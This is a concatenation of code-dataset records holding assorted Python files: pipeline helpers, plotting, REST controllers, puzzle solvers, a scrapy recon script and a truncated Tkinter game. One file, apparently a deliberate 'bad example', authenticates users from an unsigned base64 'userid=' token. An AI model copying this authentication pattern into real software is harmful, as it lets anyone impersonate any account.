echo(pipeline)\n \n TODO\n 1. echo(\"...\", pipeline)\n 2. echo(\"...\") | pipeline | echo\n \n \"\"\"\n log.debug('Echo.__call__(self={}, other={})'.format(repr(self), repr(other)))\n if other:\n self.run(stdin=other.proc.stdout)\n\nclass FakeProc():\n \"\"\"\n A fake subprocess.Popen\n \"\"\"\n stdin = None\n stdout = None\n stderr = None\n \n def read_from_pipe(self, pipe):\n \"\"\"\n Read from a pipe until it is empty, then return.\n Blocking, good for communicate() type reads.\n \"\"\"\n output = b''\n while True:\n # Read from stdout\n in_bytes = pipe.readline()\n if not in_bytes:\n break\n output += in_bytes\n return output\n \n def communicate(self, input=None, timeout=None):\n \"\"\"\n Copy of Popen.communicate(input=None, timeout=None)\n \"\"\"\n stdout_bytes, stderr_bytes = None, None\n if self.stdin:\n self.stdin.write(input)\n if self.stdout:\n stdout_bytes = self.read_from_pipe(pipe=self.stdout)\n if self.stderr:\n stderr_bytes = self.read_from_pipe(pipe=self.stderr)\n return (stdout_bytes, stderr_bytes)\n\n#\n# Applications\n#\n\nclass Cd(Process):\n def run(self, stdin=None, stdout=None, stderr=None):\n log.debug('Cd.run(self={}, stdin={}, stdout={}, stderr={})'.format(repr(self), stdin, stdout, stderr))\n self.proc = FakeProc()\n \n # TODO if stdin, read dir name from stdin (?)\n\n # Change to new directory \n new_dir = self.popen_args[-1] \n os.chdir(new_dir)\n \n if stdout == subprocess.PIPE:\n # Open a new pipe\n read_pipe, write_pipe = os.pipe()\n write_fd = os.fdopen(write_pipe, 'w')\n read_fd = os.fdopen(read_pipe, 'r')\n # HACK keep reference to read_fd so it won't be automatically closed \n # when we leave this function\n self.read_fd = read_fd\n # Set our stdout to the 'read' end of our pipe \n self.proc.stdout = io.FileIO(read_fd.fileno(), 'r')\n # Write to the 'write' end of our pipe, then close it\n write_fd.write(new_dir)\n write_fd.flush()\n write_fd.close()\n\n#\n# Standard commands\n#\n\nping = Process('ping')\nmore = Process('more')\ngrep = Process('grep')\n\necho = Echo()\ncd = Cd()\n\n# Some hacks for Windows\nif os.name == 'nt':\n ipconfig = Process('ipconfig')\n more = Process('more', shell=True)\n dir = Process('dir')\n pwd = Process('cd', shell=True)\n\n","sub_path":"pysh.py","file_name":"pysh.py","file_ext":"py","file_size_in_byte":11213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"597877671","text":"from matplotlib import pyplot as pl\nimport sys\nimport numpy as np\n\n\ndef is_outlier(points, thresh=3.5):\n \"\"\"\n Returns a boolean array with True if points are outliers and False \n otherwise.\n\n Parameters:\n -----------\n points : An numobservations by numdimensions array of observations\n thresh : The modified z-score to use as a threshold. Observations with\n a modified z-score (based on the median absolute deviation) greater\n than this value will be classified as outliers.\n\n Returns:\n --------\n mask : A numobservations-length boolean array.\n\n References:\n ----------\n Boris Iglewicz and David Hoaglin (1993), \"Volume 16: How to Detect and\n Handle Outliers\", The ASQC Basic References in Quality Control:\n Statistical Techniques, Edward F. Mykytka, Ph.D., Editor. \n \"\"\"\n if len(points.shape) == 1:\n points = points[:,None]\n median = np.median(points, axis=0)\n diff = np.sum((points - median)**2, axis=-1)\n diff = np.sqrt(diff)\n mad = np.median(diff)\n\n modified_z_score = 0.6745 * diff / mad\n\n return modified_z_score > thresh\n\n\ndef plot_d(dfilename):\n\twith open(dfilename) as df:\n\t\tnext(df)\n\t\tind = 0\n\t\tfor interval in df:\n\t\t\tdata = next(df)\n\t\t\tpl.figure()\n\t\t\tvals = np.array([float(val) for val in data.split()])\n\t\t\tvals[is_outlier(vals)] = float(\"nan\")\n \t \n\t\t\tpl.plot(vals)\n\t\t\tpl.ylim(0, 0.01)\n\t\t\tpl.xlabel(\"Position(bp)\")\n\t\t\tpl.ylabel(\"Probability error\")\n\t\t\tpl.title(dfilename + \", interval %s\" % interval)\n\t\t\tpl.savefig(dfilename+\".%s.png\" % ind) \n\t\t\tpl.close()\n\t\t\tind += 1 \t\n\n\ndef main():\n if len(sys.argv) == 1:\n print(\"Set errors.file to plot distribution...\")\n return\n\n plot_d(sys.argv[1]) \n\n\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"out/Box_3b.bam_out/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"500706563","text":"from rest_framework.authentication import TokenAuthentication\nfrom rest_framework import exceptions\nfrom django.contrib.auth.models import User\nimport base64\nfrom tokens.models import BadToken\n\n\n\nclass BadTokenAuthentication(TokenAuthentication):\n\n\n def authenticate(self, request):\n token = request.META.get(\"HTTP_AUTHORIZATION\")\n if not token:\n return None\n try:\n stringtodecode = token.replace(\"Token\", \"\")\n answer = base64.b64decode(stringtodecode)\n answer2 = answer.decode(\"utf-8\")\n if \"userid=\" in answer2:\n id = answer2.replace(\"userid=\", \"\")\n user = User.objects.filter(pk=id).first()\n else:\n return None\n except User.DoesNotExist:\n raise exceptions.AuthenticationFailed('No such user')\n return (user, None)\n\n\n\n","sub_path":"bad_example/tokens/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"384007069","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport pecan\nfrom pecan import rest\n\n\nclass Controller(rest.RestController):\n\n @pecan.expose('json')\n def get(self):\n return {\"version\": \"1.0.0\"}\n\n @pecan.expose('json')\n def post(self, **kwargs):\n values = {\n 'row_name': kwargs['row_name'],\n 'location': kwargs['location'],\n 'datacenter_assign': kwargs['datacenter_assign'],\n }\n row = pecan.request.db_api.row_create(\n context=pecan.request.context, values=values)\n return row\n\n @pecan.expose('json')\n def get_all(self):\n datacenter_id = pecan.request.GET.get('datacenter_id', None)\n rows = pecan.request.db_api.row_get_all(context=pecan.request.context,\n datacenter_id=datacenter_id)\n\n for i in rows:\n u_used = 0\n u_sum = 0\n id = i.id\n cabinets = pecan.request.db_api.cabinet_get_all(\n context=pecan.request.context, row_id=id)\n for d in cabinets:\n u_sum = d.u_num +u_sum\n nodes = pecan.request.db_api.node_get_all_cabinet(\n context=pecan.request.context, cabinet_id=d.id)\n racks = pecan.request.db_api.rack_get_all(\n context=pecan.request.context, cabinet_id=d.id)\n node_list=list()\n for node in nodes:\n for height_num in range(node.height):\n rack_num = node.rack_location\n rack_location= rack_num + height_num\n node_list.append(rack_location)\n u_used = u_used + len(node_list)\n for use_rack in racks:\n if use_rack.rack_status == 'reserve':\n u_used = u_used +1\n else:\n u_used= u_used + 0\n for rack in racks:\n if int(rack.rack_location) not in node_list and rack.rack_status == 'use':\n u_used = u_used + 1\n i.u_used = u_used\n i.u_sum = u_sum -u_used\n return {\"rows\": rows}\n\n\n @pecan.expose('json')\n def delete(self, id):\n res = pecan.request.db_api.row_delete(\n pecan.request.context, id)\n\n return {'status': res}\n\n @pecan.expose('json')\n def get(self, id):\n row = pecan.request.db_api.row_get(\n pecan.request.context, id)\n\n return row\n\n @pecan.expose('json')\n def put(self, id, **kwargs):\n row = pecan.request.db_api.row_update(\n pecan.request.context, id, kwargs)\n\n return row\n\n\n\n\n","sub_path":"solid/api/controllers/v1/row.py","file_name":"row.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"6098436","text":"from collections import deque\nfrom typing import List\n\nclass Solution:\n def snakesAndLadders(self, board: List[List[int]]) -> int:\n n = len(board)\n def _convertPos(num):\n # 1: [m-1, 0]\n r, c = divmod(num-1, n)\n\n if r % 2 == 0: # 13(12) -> [2, 0]\n return n-1-r, c\n\n return n-1-r, n-1-c # 12(11) -> [1, 5]\n\n queue = deque()\n queue.append((0, 1))\n seen = set()\n seen.add(1)\n\n while queue:\n steps, pos = queue.popleft()\n x, y = _convertPos(pos)\n\n if board[x][y] != -1:\n pos = board[x][y]\n\n # flag: pay attention to where you put this if statement\n # if we put before board[x][y] != -1, then we will have\n # additional 1 step\n if pos == n*n:\n return steps\n\n for dx in range(1, 7):\n new_pos = pos + dx\n\n if new_pos <= n*n and new_pos not in seen:\n queue.append((steps+1, new_pos))\n seen.add(new_pos)\n return -1","sub_path":"Leetcode/909.py","file_name":"909.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"456898968","text":"import os, time\nimport subprocess\n\n# to add to start menu in windowns\n# add to C:\\Users\\Lars\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\ndef exitGame(chPid):\n if chPid == os.getpid():\n print(f\"\\nclosing Game\")\n subprocess.call(['Taskkill', '/PID', str(chPid), '/F'], shell=True)\n #subprocess.call(['Taskkill', '/IM', 'python.exe', '/F'], shell=True)\n else:\n print(f\"Procsss: {os.getpid()} not closed, because got {chPid}\")\n\nif __name__ == '__main__': \n exitGame('12345')","sub_path":"web_project/chess/exit.py","file_name":"exit.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"364278051","text":"import tests_basis\nimport sys\nfrom data_fetching.question_fetcher import get_questions_batch\nfrom data_fetching.data_path import get_path\n\n\ndef test_fn(args):\n batch = get_questions_batch(args[0], args[1], args[2])\n return len(batch)\n\n\ndef main(starting_counter):\n test_args, test_exps = [], []\n\n path = get_path('validation', 'abstract_scenes_v1', 'questions')\n\n test_args.append([29994, 6, path])\n test_exps.append(6)\n\n test_args.append([29900, 32, path])\n test_exps.append(32)\n\n test_args.append([20000, 20, path])\n test_exps.append(20)\n\n tests_basis.create_tests([test_fn] * len(test_args), test_args, test_exps)\n\n return tests_basis.main_tester(\"Testing questions batch loading\", starting_counter)\n\n\nif __name__ == \"__main__\":\n tests_basis.set_options(sys.argv)\n main(1)\n","sub_path":"tests/question_fetcher_test.py","file_name":"question_fetcher_test.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"198953765","text":"n=int(input('Digite o numero de elementos que você deseja ver na sequencia de Fibonacci:'))\nv=2\nt1=0\nt2=1\nt3=0\nprint('{}-{}'.format(t1,t2),end='')\nwhile n!=v:\n t3=t1+t2\n print('-{}'.format(t3)if v<=n else'' ,end='')\n t1=t2\n t2=t3\n v+=1","sub_path":"des63.py","file_name":"des63.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"360994071","text":"import requests\r\nimport scrapy\r\nfrom scrapy.crawler import CrawlerProcess\r\n\r\n\r\n# Spider class is used to do web scraping.\r\nclass MapSpider(scrapy.Spider):\r\n name = \"Map_Spider\"\r\n\r\n def parse(self, response):\r\n # identify all the image tags.\r\n css_selector = 'img'\r\n # loop through all the image tags found.\r\n for x in response.css(css_selector):\r\n # get the src attribute from the image tag and extract the value.\r\n newsel = '@src'\r\n image_link = x.xpath(newsel).extract_first()\r\n # check if the value is a jpg image link.\r\n if '.jpg' in image_link or '.jpeg' in image_link:\r\n print(\"Image Link:\", image_link)\r\n # extract the result into json file.\r\n yield {\r\n 'Image Link': image_link,\r\n }\r\n # check if there is a next page.\r\n page_selector = '.next a ::attr(href)'\r\n next_page = response.css(page_selector).extract_first()\r\n if next_page:\r\n # if there is a next page move to the next page.\r\n yield scrapy.Request(response.urljoin(next_page), callback=self.parse)\r\n\r\n\r\ndef recon(url):\r\n # headers are declared to modify the user-agent\r\n headers = {\r\n 'User-Agent': 'Mobile'\r\n }\r\n # requests.get issues a get request to the url, and with the headers parameter,\r\n # the user-agent will be modified.\r\n h = requests.get(url, headers=headers)\r\n print(\"==========Reconnaissance Results==========\")\r\n # retrieves the status code of the response and print OK if the status code is 200.\r\n\r\n url2 = 'http://172.18.58.238/headers.php'\r\n rh = requests.get(url2, headers=headers)\r\n print(rh.text)\r\n\r\n if h.status_code == 200:\r\n print(\"Status Code: OK (%d)\" % h.status_code)\r\n else:\r\n print(\"Status Code: Failed (%d)\" % h.status_code)\r\n # retrieves the header of the response and print the fields out line by line.\r\n print(\"Header:\")\r\n for x in h.headers:\r\n print(\"\\t \", x, \":\", h.headers[x])\r\n\r\n # content of the response is returned for unit test\r\n return h.text\r\n\r\n\r\ndef map_url(url):\r\n # Create a crawler process to run the scrapy without typing in command line.\r\n # set the output to results.json as a json file and disable logging.\r\n process = CrawlerProcess(settings={\r\n 'FEED_FORMAT': 'json',\r\n 'FEED_URI': 'results.json',\r\n 'LOG_ENABLED': False\r\n })\r\n # set the process to crawl using Map spider and provide the url to crawl\r\n process.crawl(MapSpider, start_urls=[url])\r\n process.start()\r\n\r\n\r\ndef main():\r\n url = 'http://172.18.58.238/snow/'\r\n recon(url)\r\n map_url(url)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"reconNmap.py","file_name":"reconNmap.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"564754608","text":"# need to import \nimport fresh_tomatoes\nimport media\n\n# create the instances of the Movie class\ntoy_story = media.Movie(\"Toy Story\", \"A Story of a boy and his toys\", \n\t\t\t\t\t\t\"http://www.rotoscopers.com/wp-content/uploads/2013/10/Toy-Story-Poster.jpg\", \n\t\t\t\t\t\t\"https://www.youtube.com/watch?v=KYz2wyBy3kc\")\n\navatar = media.Movie(\"Avatar\", \"A movie about blue aliens that are huge tree huggers!\", \n\t\t\t\t\t \"http://t0.gstatic.com/images?q=tbn:ANd9GcQCfmvrE4fMo2cd8esc7mDZPtFSJThAujddMPkRtti1_ij6u-jp\",\n\t\t\t\t\t \"https://www.youtube.com/watch?v=d1_JBMrrYw8\")\n\nschool_of_rock = media.Movie(\"School of Rock\", \"Using rock music to be super cool and impress little kids\",\n\t\t\t\t\t\t\t \"https://upload.wikimedia.org/wikipedia/en/1/11/School_of_Rock_Poster.jpg\",\n\t\t\t\t\t\t\t \"https://www.youtube.com/watch?v=XCwy6lW5Ixc\")\n\ntraining_day = media.Movie(\"Training Day\", \"Really cool cop movie about making it on the corrupt streets\",\n\t\t\t\t\t \t \"http://www.impawards.com/2001/posters/training_day_ver1.jpg\",\n\t\t\t\t\t \t \"https://www.youtube.com/watch?v=gKTVQPOH8ZA\")\n\nthe_notebook = media.Movie(\"The Notebook\", \"A really sentimental love story about letting the person \\\n\t\t\t\t\t\t\tyou love go and come back\",\n\t\t\t\t\t\t \"http://www.impawards.com/2004/posters/notebook_ver2.jpg\",\n\t\t\t\t\t\t \"https://www.youtube.com/watch?v=4M7LIcH8C9U\")\n\nthe_hunger_games = media.Movie(\"The Hunger Games\", \"A movie about kids killer each other \\\n\t\t\t\t\t\t\t\tin a weird futuristic world\",\n\t\t\t\t\t\t\t \"http://www.impawards.com/2012/posters/hunger_games_ver23_xlg.jpg\",\n\t\t\t\t\t\t\t \"https://www.youtube.com/watch?v=SMGRhAEn6K0\")\n\n# define movies variable\nmovies = [toy_story, avatar, school_of_rock, training_day, the_notebook, the_hunger_games]\n\n# call webpage\nfresh_tomatoes.open_movies_page(movies)\n","sub_path":"movies/entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"498499943","text":"def quick_sort(books):\n if len(books) <=1:\n return books\n else:\n pivot = books[0]\n lhs = [item for item in books[1:] if item<= pivot]\n print(\"Left hand Side\", lhs)\n rhs = [item for item in books[1:] if item> pivot]\n print(\"Right hand Side\", rhs)\n print(\"Books: \", books)\n return quick_sort(lhs) + [pivot] + quick_sort(rhs)\n \nquick_sort([5,2,8,4,0,1,9,7])","sub_path":"src/quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"511315757","text":"from flask import Flask, render_template, request, jsonify, Markup\nimport json\nimport os\nimport sqlite3 #Database management library we used\nimport jinja2\n\n\n#for row in c.execute('SELECT * FROM USIODB'):\n# print row\n\napp = Flask(__name__, static_folder='.', static_url_path='')\n\n# Handler\n@app.route(\"/home.html\")\ndef index():\n return render_template('home.html')\n\n@app.route(\"/pivot_table.html\")\ndef pivot_table():\n\n # Process the Database\n conn = sqlite3.connect('USIODB.db')\n c = conn.cursor()\n\n table = html_table(c)\n\n# for sublist in c.execute('SELECT * FROM USIODB'):\n# print sublist\n c.close()\n conn.close()\n\n return render_template('pivot_table.html',table = Markup(table))\n\ndef html_table(c):\n # Generates table\n table = ''\n\n header = 1\n\n for row in c.execute('SELECT * FROM USIODB'):\n\n table += ''\n if header:\n table+=''\n for data in row:\n table+=''.format(data)\n table+=''\n header = 0\n\n else:\n\n for data in row:\n table+=''.format(data)\n table+=''\n\n table+='
{}
{}
'\n return table\n\n@app.route(\"/pivot_table_builder.html\", methods = ['POST','GET'])\ndef pivot_table_builder():\n if request.method == 'POST':\n # e.g. ImmutableMultiDict([('colLabel', u'Export Inc/Dec'), ('filterName', u'Service Balance'), ('aggregationOf', u'Minimum of'), ('aggregationCol', u'Service Balance'), ('filterQuery', u'<')])\n\n # Check Validation\n try:\n dic = request.form\n colLabel = dic['colLabel']\n filterName = dic['filterName']\n filterQuery = dic['filterQuery']\n aggregationOf = dic['aggregationOf']\n aggregationOf = dic['aggregationCol']\n except KeyError:\n raise RuntimeError('Wrong input')\n \n return render_template('pivot_table_builder')\n \n \n \n return render_template('pivot_table_builder.html')\n\n@app.route(\"/interesting_sights.html\")\ndef interesting_sights():\n return render_template('interesting_sights.html')\n\t\ndef table_selector():\n return false\n\nif __name__ == \"__main__\":\n app.run(debug=True, host='127.0.0.1', port=8765)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"247478631","text":"#Enhan Zhao 11097118 CMPT 141(01) L09\n\n\ndef ThreeSUM(in_list):\n \"\"\"\n Determines whether or not there are three integers in the input list that sum to zero.\n :param : in_list a list of integers, any length\n :return: True if in_list contains three integers that sum to zero.\n \"\"\"\n in_list.sort()\n \n if (len(in_list)) < 3:\n return False\n \n for first in range(0, len(in_list) - 2):\n a = in_list[first]\n second = first + 1\n third = len(in_list) - 1\n while second < third:\n b = in_list[second]\n c = in_list[third]\n if a + b + c == 0:\n return True\n if a + b + c > 0:\n third -= 1\n else:\n second += 1\n return False\n\ntest_ThreeSUM = [ {'inputs' : [0, 0, 0],\n 'outputs': True,\n 'reason' : \"should return True as there are 3 zeros in sequence and their sum is zero\"},\n {'inputs' : [0, 0, 1],\n 'outputs': False,\n 'reason' : \"should return False, as there is no way for a sum of 0\"},\n {'inputs' : [0, 0],\n 'outputs': False,\n 'reason' : \"even though sequence sum is zero, it only contains 2 items\"},\n {'inputs' : [0, 1],\n 'outputs': False,\n 'reason' : \"sum is not zero, and sequence only contain 2 items\"},\n {'inputs' : [0, 1, 1, 1, 0, 0, 1, 1, 1],\n 'outputs': True,\n 'reason' : \"should return True if function iterates over the first item\"},\n {'inputs' : [1, 1, 1, 1, 0, 0, 1, 1, 0],\n 'outputs': True,\n 'reason' : \"should return True if function iterates over the last item\"},\n {'inputs' : [],\n 'outputs': False,\n 'reason' : \"should return False with empty sequence\"},\n {'inputs' : [0, 10, 0, 10, 0],\n 'outputs': True,\n 'reason' : \"test for when the intergers need for sum 0 is in the beginning, the middle and the end of the sequence\"},\n {'inputs' : [-4, -2, -1, 1, 2, 3],\n 'outputs': True,\n 'reason' : \"test for first second and third are at least one item away from each other\"},\n {'inputs' : [-5, 0, 2, 3],\n 'outputs': True,\n 'reason' : \"test for when first is at least one item away from second and third\"},\n {'inputs' : [- 10, -11, 0, 1, 21, 20],\n 'outputs': True,\n 'reason' : \"test for when third is at least one item away from first and second\"},\n ]\n\n\nfor test in test_ThreeSUM:\n inputs = test['inputs']\n result = ThreeSUM(inputs) \n if result != test['outputs']:\n print('Error: Returned', result, 'on inputs', inputs, '('+str(test['reason'])+')')\n","sub_path":"a8/a8q2_testing.py","file_name":"a8q2_testing.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"472214813","text":"import torch\n\nimport constants\nfrom left_padded_conv import LeftPaddedConv\n\n\nclass ConvDecoder(torch.nn.Module):\n\n def __init__(self):\n super(ConvDecoder, self).__init__()\n self.block_dilations = list(\n reversed([2 ** i for i in range(constants.NUM_CONV_LAYERS)]))\n self.layers = torch.nn.ModuleList(\n [torch.nn.Linear(constants.ENCODED_BITSEQ_LENGTH,\n constants.WAV_CHUNK_SIZE)] +\n [LeftPaddedConv(\n in_channels=1 if i == 0 else constants.INTERMEDIATE_CHANNEL_DIM,\n out_channels=256 if i == (constants.NUM_CONV_LAYERS - 1) else constants.INTERMEDIATE_CHANNEL_DIM,\n kernel_size=2,\n dilation=dilation\n ) for i, dilation in enumerate(self.block_dilations)]\n )\n\n def forward(self, z):\n current_z = z.unsqueeze(dim=1)\n for i, l in enumerate(self.layers):\n current_z = l(current_z) # intermediate activations?\n return current_z\n","sub_path":"conv_decoder.py","file_name":"conv_decoder.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"259849908","text":"### load data from file\ninput_file = open(\"input_lab8.txt\", \"r\")\n\nmarks = []\n\nwhile True:\n line = input_file.readline()\n\n if len(line) == 0:\n break # end of file\n line = line.strip()\n if len(line) == 0:\n continue # skip blank lines\n\n #print(line)\n\n line_break = line.split(\" \")\n marks.append(int(line_break[1].strip()))\n \n#print(marks)\n\n### Calculate statistics\naverage = sum(marks)/len(marks)\nminimum = min(marks)\nmaximum = max(marks)\n\n\n### calculate display for bars\nbars = []\n\nfor i in range(0,10):\n bars.append(0)\n\nfor mark in marks:\n bars[mark//10] += 1\n\n### generate html\ntags = \"

Welcome to statistics page!

\"\n\nhtml = \"
Average is: \" + str(average) + \\\n \"
Minimum is: \" + str(minimum) + \\\n \"
Maximum is: \" + str(maximum) +\"


\"\n\nchart = \" \"\nline2 = \"\"\n\ni=0\nfor b in bars:\n height = 20 * b\n chart += \"\"\n line2 += \"\"\n i += 10\n\nchart += \"\"\nendtags = \"
[\" + str(i) + \"-\" + str(i+9) + \"]
\"\n\nout = open(\"lab8q2_outputv1.html\", 'w')\nout.write(tags + html + chart + line2 + endtags)\nout.close()\n","sub_path":"175 _labs/lab8_q2_v1.py","file_name":"lab8_q2_v1.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"613704719","text":"\"\"\"This script sends a data value to the thingspeak mqtt broker\"\"\"\n\nimport paho.mqtt.client as mqtt\nimport random as rnd\n\nclient = mqtt.Client()\nclient.connect(\"mqtt.thingspeak.com\", 1883, 60)\n\nchannelId = \"796449\" # Put your channel ID here,i.e.. the number from the URL, https://thingspeak.com/channels/285697\napiKey = \"CE3VZQG9NVE186VO\" # Put the API key here (the Write API Key from the API Keys tab in ThingSpeak)\n\n\n\nclient.publish(f\"channels/{channelId}/publish/{apiKey}\" , \"field1=102\", 0)\nclient.loop(2)\n","sub_path":"mqtt-local-client/r.py","file_name":"r.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"418768340","text":"from pubnub import Pubnub\r\nimport httplib, time,json,urllib,constants,grovepi, urllib2\r\nfrom grovepi import *\r\n\r\nclass SmartGarden:\r\n def update(self, sessionToken, username):\r\n self.username = username\r\n self.sessionToken = sessionToken\r\n self.temperature = 0\r\n self.humidity = 0\r\n self.moisture = 0\r\n self.light = 0\r\n self.waterNow = False\r\n grovepi.pinMode(constants.LIGHT_PIN,\"INPUT\")\r\n grovepi.pinMode(constants.MOISTURE_PIN,\"INPUT\")\r\n grovepi.pinMode(constants.TEMP_HUMIDITY_PIN,\"INPUT\")\r\n grovepi.pinMode(constants.PUMP_RELAY_PIN,\"OUTPUT\")\r\n self.pubnub = Pubnub(publish_key=constants.PUBNUB_PUBLISH_KEY, subscribe_key=constants.PUBNUB_SUBSCRIBE_KEY, ssl_on = True)\r\n self.sendSensors = False\r\n while True: #keep trying until you have internet\r\n try:\r\n req = urllib2.Request(constants.ROOT_URL + 'active-plant')\r\n req.add_header('x-access-token', sessionToken)\r\n result = json.loads(urllib2.urlopen(req).read())\r\n\r\n self.waterAmount = result[\"waterAmount\"]\r\n self.harvest = len(result[\"harvests\"])\r\n self.moistureLimit = result[\"moistureLimit\"] \r\n break\r\n except Exception as e:\r\n s = str(e)\r\n \r\n def __init__(self, sessionToken, username):\r\n self.update(sessionToken, username)\r\n\r\n def ioLoop(self):\r\n while True: \r\n time.sleep(.2)\r\n if self.sendSensors:\r\n while self.waterNow:\r\n time.sleep(.1) \r\n self.readSensors() \r\n data = {\r\n \"humidity\":self.humidity,\r\n \"light\":self.light,\r\n \"moisture\":self.moisture,\r\n \"temperature\":self.temperature \r\n }\r\n self.pubnub.publish(self.username + constants.WEBSITE_CHANNEL, data)\r\n\r\n def sendDataDb(self, water = False):\r\n if self.sendSensors:\r\n time.sleep(.3) #wait long enough for it to read, it should have already read a bunch but this is just to make sure\r\n else:\r\n self.readSensors()\r\n data = {\r\n \"humidity\":self.humidity,\r\n \"light\":self.light,\r\n \"moisture\":self.moisture,\r\n \"temperature\":self.temperature,\r\n \"harvest\":self.harvest,\r\n \"water\": self.waterAmount if water else 0,\r\n }\r\n while True:\r\n try:\r\n req = urllib2.Request(constants.ROOT_URL + 'sensor-data')\r\n req.add_header('Content-Type', 'application/json')\r\n req.add_header('x-access-token', self.sessionToken)\r\n response = urllib2.urlopen(req, json.dumps(data)).read()\r\n break\r\n except Exception as e:\r\n s = str(e) \r\n\r\n def sendDataDbAndCheckWater(self):\r\n while True:\r\n time.sleep(900) #every 15 minutes\r\n if self.sendSensors:\r\n time.sleep(.3) #wait long enough for it to read\r\n else:\r\n self.readSensors()\r\n if self.moisture < self.moistureLimit:\r\n self.waterPlants()\r\n else:\r\n self.sendDataDb()\r\n\r\n def waterPlants(self): \r\n self.waterNow = True\r\n grovepi.digitalWrite(constants.PUMP_RELAY_PIN,1)\r\n time.sleep(self.waterAmount / constants.FLOW_RATE)\r\n grovepi.digitalWrite(constants.PUMP_RELAY_PIN,0)\r\n grovepi.digitalWrite(constants.PUMP_RELAY_PIN,0)\r\n grovepi.digitalWrite(constants.PUMP_RELAY_PIN,0)\r\n self.waterNow = False\r\n self.sendDataDb(True) \r\n\r\n def readSensors(self):\r\n try:\r\n while True:\r\n [ temperature, humidity ] = dht(constants.TEMP_HUMIDITY_PIN,0)\r\n moisture = grovepi.analogRead(constants.MOISTURE_PIN)\r\n light = grovepi.analogRead(constants.LIGHT_PIN)\r\n if temperature < 200 and temperature >= 0 and humidity >=0 and humidity <= 100 and moisture >= 0 and moisture <= 700 and light >= 0 and light <= 700:\r\n self.temperature = temperature\r\n self.humidity = humidity\r\n self.moisture = moisture\r\n self.light = light\r\n break\r\n except Exception as e:\r\n self.readSensors() #keep trying until it works\r\n","sub_path":"SmartGarden.py","file_name":"SmartGarden.py","file_ext":"py","file_size_in_byte":4638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"200213146","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\n\n\nActivePlayer = 1\nP1=[]\nP2=[]\n\n\n#-------------------------------------------------------------------\n\nroot=Tk()\nroot.title('Tic Tac Toy : Player 1')\nroot.maxsize(300,300)\nstyle=ttk.Style()\nstyle.theme_use('classic')\n\n\n#-------------------------------------------------------------\n\nbou1=ttk.Button(root,text='')\nbou1.grid(row=0,column=0,ipadx=30,ipady=30,sticky='snew')\nbou1.config(command=lambda:buclick(1))\n\n\nbou2=ttk.Button(root,text='')\nbou2.grid(row=0,column=1,ipadx=30,ipady=30,sticky='snew')\nbou2.config(command=lambda:buclick(2))\n\n\nbou3=ttk.Button(root,text='')\nbou3.grid(row=0,column=2,ipadx=30,ipady=30,sticky='snew')\nbou3.config(command=lambda:buclick(3))\n\n\nbou4=ttk.Button(root,text='')\nbou4.grid(row=1,column=0,ipadx=30,ipady=30,sticky='snew')\nbou4.config(command=lambda:buclick(4))\n\n\nbou5=ttk.Button(root,text='')\nbou5.grid(row=1,column=1,ipadx=30,ipady=30,sticky='snew')\nbou5.config(command=lambda:buclick(5))\n\n\nbou6=ttk.Button(root,text='')\nbou6.grid(row=1,column=2,ipadx=30,ipady=30,sticky='snew')\nbou6.config(command=lambda:buclick(6))\n\n\nbou7=ttk.Button(root,text='')\nbou7.grid(row=2,column=0,ipadx=30,ipady=30,sticky='snew')\nbou7.config(command=lambda:buclick(7))\n\n\nbou8=ttk.Button(root,text='')\nbou8.grid(row=2,column=1,ipadx=30,ipady=30,sticky='snew')\nbou8.config(command=lambda:buclick(8))\n\n\nbou9=ttk.Button(root,text='')\nbou9.grid(row=2,column=2,ipadx=30,ipady=30,sticky=